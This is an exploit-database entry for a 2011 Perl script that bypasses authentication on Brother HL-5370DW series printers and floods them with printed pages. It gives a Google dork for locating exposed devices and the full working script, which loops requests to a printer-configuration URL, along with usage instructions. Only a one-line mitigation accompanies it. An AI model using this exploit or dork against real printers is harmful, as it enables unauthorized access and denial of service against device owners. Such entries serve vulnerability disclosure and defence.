Brother HL-5370DW series auth bypass printer flooder

vendor:

HL-5370DW series

by:

chrisB

7.5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: HL-5370DW series

Affected Version From: Brother HL-5370DW series

Affected Version To: Brother HL-5370DW series

Patch Exists: NO

Related CWE: N/A

CPE: h:brother:hl-5370dw_series

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2011

Brother HL-5370DW series auth bypass printer flooder

This exploit allows an attacker to bypass authentication and flood a Brother HL-5370DW series printer with pages.

Mitigation:

Ensure that authentication is enabled on the printer and that only authorized users are allowed to access it.

Source

Exploit-DB raw data:

# Exploit Title: Brother HL-5370DW series auth bypass printer flooder
# Google Dork: Copyright(C) 2000-2009 Brother Industries, Ltd. All Rights Reserved. Brother HL-5370DW series
# Date: 31/05/2011
# Author: chrisB
# Contact : chrisb [@) gmx.fr
# Version: Brother HL-5370DW series

#!/usr/bin/perl
use LWP::Simple;

usage() unless $ARGV[1];

$replace = 'post/panel.html?EXECUTE2=PRTCONFIG';
$hint = $ARGV[1];
$goodurl = $ARGV[0];
$success = 0;
$goodurl =~ s/main.html/$replace/; 

 for ($count = $hint + 1; $count >= 1; $count--) {
 		$contents = get($goodurl);

	if($contents =~ m/acknowledged/i) 
	{
		$success++;
		print "success\n";
	} 
	else 
	{
		print "error, busy or no more paper\n";
	}
 }
 print "pages printed : $success \r\n"; 
	
sub usage 
{
 print qq( Brother HL-5370DW series auth bypass printer flooder
       
Usage: perl $0 [http://url.fr/printer/main.html] [hints]
                  
)   and exit;
}